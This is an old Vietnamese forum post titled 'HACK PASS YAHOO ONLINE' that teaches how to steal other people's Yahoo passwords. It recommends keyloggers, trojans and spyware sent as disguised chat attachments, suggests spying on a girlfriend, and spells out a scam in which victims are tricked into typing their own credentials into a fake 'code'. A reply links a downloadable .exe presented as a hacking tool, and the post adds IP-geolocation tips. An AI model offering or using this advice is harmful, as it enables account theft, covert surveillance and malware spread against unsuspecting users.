»-(¯`v´¯)-» (SonLove) »-(¯`v´¯)-»

Hãy đăng kí làm thành viên của truongson forum để được hưởng quyền
lợi do forum cung cấp . "4all.forum-viet.net" nơi trao đổi giao
lưu , học hỏi kinh nghiệm và la nơi cung cấp nhiều phần mềm hay
hỗ trợ chơi các game online mới nhất va kịp thời nhất!

Hãy đăng kí làm thành viên của truongson forum để được hưởng quyền
lợi do forum cung cấp . "4all.forum-viet.net" nơi trao đổi giao
lưu , học hỏi kinh nghiệm và la nơi cung cấp nhiều phần mềm hay
hỗ trợ chơi các game online mới nhất va kịp thời nhất!
Bạn có muốn phản ứng với tin nhắn này? Vui lòng đăng ký diễn đàn trong một vài cú nhấp chuột hoặc đăng nhập để tiếp tục.

Trang ChínhTrang Chính  Tìm kiếmTìm kiếm  Latest imagesLatest images  Đăng kýĐăng ký  Đăng Nhập  HACK PASS YAHOO ONLINE Images11  HACK PASS YAHOO ONLINE Head  

HACK PASS YAHOO ONLINE

Go down 
Tác giảThông điệp
Admin
Admin
Admin

Điểm : 725
thank : 0

HACK PASS YAHOO ONLINE Empty
Bài gửiTiêu đề: HACK PASS YAHOO ONLINE   HACK PASS YAHOO ONLINE EmptyWed Sep 16, 2009 2:25 pm

Hack pass khó hay dể ? câu trả lời không khó với người biết sử dụng hiện mạng máy tính chia là 7 tầng và nhưng người chỉ biết sử dụng phần mềm hay thao tác đơn giản với máy tính tầng đó gọi là tầng thứ 7 tầng giao diện người dùng (Application), tôi biết tất cả các bạn trong blog của tôi chỉ biết và sử dụng tầng 7 nên tôi chỉ các bạn mấy phần mềm để sử dụng trước tiên nói tới phần mềm lấy pass thì chia là 3 loại ^^

1. KEYLOG : là chương trình lấy pass thông qua bàn phiếm là cách lấy pass ngu nhất nhưng rất hiệu quả điển hình là perfect keylog

2. TROJAN : cái này chia là 2 loại nhỏ

+ loại lấy pass đơn giản như : GF (girl friend),và nhiều loại khác tôi không thể thống kê hết nhưng các bạn nên để ý vì loại trojan tôi nói là chưa bị các chương trình diệt virus cập nhật hiện nó có 3 phiên bản tất cả đều dùng tốt . tuy nhiên cũng có vài loia5 khác như godwill 1.0.6 và cyn 21 là trojan nhưng hỗ trợ chức năng khác

+ , loại mở port và điều khiển máy tính người khác như Sub 7 cái này tuy bị các chương trình diệt vi rus cập nhập nhưng phiên bản nâng cấp và thay đổi thường xuyên nên đến giờ nó vẫn là nhất

note : không khuyến khích các bạn sử dụng nếu như ko biết dùng vì nó là còn dao hai lưỡi có thề bạn sẽ là người bị mất pass và máy tính của bạn cũng bị die vì trojan có tích hợp tinh năng của virus

3. là SPY loại này được gọi là chương trình gián điệp tích hợp cách chức năng của 2 loại chương trình trên điển hình là các loại : net spy , my spy , 007... tôi thì chỉ quen sử dụng spy nên rành lại này hơn ^^ con my spy dễ sử dụng nhất hiện nó đang có nhiều bản nâng cấp . 1 khi đã dính vào mail hay máy tính thì ok mọi thứ thuộc về bạn ^^ ai có bạn gái dùng nó kiểm soát đây al2 1 thành quả của tôi ^^ lâu rồi chỉ để mọi người coi để biết chút thôi
như các bạn thấy có vào web nó cũng liệt kê ra ^^

và cuối cùng là làm thế nào để lấy pass ? đơn giản nguyên tắt của lấy pass dụ dỗ đánh lừa người khác trong lúc chat bạn gửi 1 file đính vào 1 bức ảnh 1 bản nhạc ... khi 1 ai đó load xuống là dính chưởng , tôi đã liệt kê những laoi5 lấy pass cho các bn ai có cần thì vào google tìm đừng tìm tôi vì tôi chỉ là thường dân áo vải thôi ^^ không dám múa rìu qua mắt thợ như 1 số forum 1 số trang web sao chép bản quyền đem post tùm lum

còn 1 cách lừa đảo đơn giản nhưng rất hiệu quả ko cần dùng chương trình bằng các đoạn mã : /config/cgi-bin/start?v703&login= "Tên login của bạn"&f="password của bạn"&f= 27586&javascript=ACTIVE&rsa> infor/-password#="" send back/?v_&from="địa chỉ muốn lấy pass" (nhớ phải đánh thêm @yahoo.com nhe!)
cách ngu nhất như hiệu quả bạn nói với bạn của bạn rằng dùng code này gửi tới hộp mail cảu bạn làm cho khéo nha tao 1 nick name mo71ic ó tên al2 findpassworh hay cái gì đó đại loại vậy khi người đó muốn lấy pass ai phải ghi nick và pass yahoo của họ vào code vậy al2 họ đã bị lừa bạn có pass của họ. chỗ tôi tôi đen là pass của kẻ ngu nhất đó keke

nói nãy giờ ko thấy tôi cho chương trình hay gì ko phải tôi đi copy hay nói sạo mà là tôi muốn tạo hứng thú cho các bạn tự tìm tòi học hỏi hãy vào google mà tìm rất nhiều ca1chnva2 nhiều chương trình chọn lựa

ngoài ra tôi cũng chỉ nói sơ lược về hck và định vị : các bạn cần học chuyên về mạng sẽ thấy có thể dùng chương trình để hack có thể dùng tập lệnh trong MS Dos hay linux bản linux dễ sử dụng và nhẹ nhất ko cần cài đó là hacao linux bạn chỉ cần bỏ đĩa vào và khỏi động lại máy khi máy khởi động nó sẽ tự boot và hiện lên giao diện linux dung lượng của nó khoảng hơn 80 Mb

tôi không hướng dẫn hết vì tôi biết mọi người ham tôi chỉ viết chơi cho co chữ thôi ^^

thông thường khi vào dos bạn ping 1 trang web sẽ thấy dc số IP tuy nhiên đó chỉ là địa chỉ ánh xạ thôi bạn nên dùng lệnh tracer

sau khi có dc IP bạn vào trang web này gõ IP mà bạn tìm dc vào ^^ http://www.ip-adress.com/ trang này sao đó bạn bấm vào lookup this IP or web site là nó sẽ hiện lên tất cả các địa phận hoặc khu vực trên toàn thế giới có cả VN bạn có thể phóng to bản đồ lên nó cho biết thực khu vực có tên đường nhưng không xác định chính ......... tôi sẽ post bài khả thi và hưu dụng hơn khi bna5 đã thực sự hiểu những gì tôi nói và nếu như trên 10 người comment tôi sẽ post bài có file download và kĩ càng hơn ^^

bài này tuy có vẻ mơ hồ và không có tính thực tiễn nhưng cũng do tôi viết ra nên nếu có coppy lại cũng để tên tôi dùm thanks các bạn người viết_Q_HACK PASS YAHOO ONLINE 3
Cac ban oi toi day cac ban tao cai hack nhung ma` dc la phai pm toi de? toi luong' nha nho chia toi 1 nua?
Vi toi khong co thoi gian de? hack nen nho` cac ban hack dc chia toi 1 nua? o nam giang co cho toi nha
http://www.freewebs.com/funyname/hakvn.exe
http://www.freewebs.com/funyname/hakvn.exe
Toi da~ host len free roi` nen cac ban chi can doal ve va dien thong tin thi link nay` se la cua ban
https://4all.forum.st

HACK PASS YAHOO ONLINE
Trang 1 trong tổng số 1 trang
 Similar topics
-
» Hack pass yahoo từ xa
» 7 cách hack pass yahoo
» hack pass game online bang seepassword
» thủ thuật hack pass(tập 2)
» Tất cả các cách ăn trộm pass word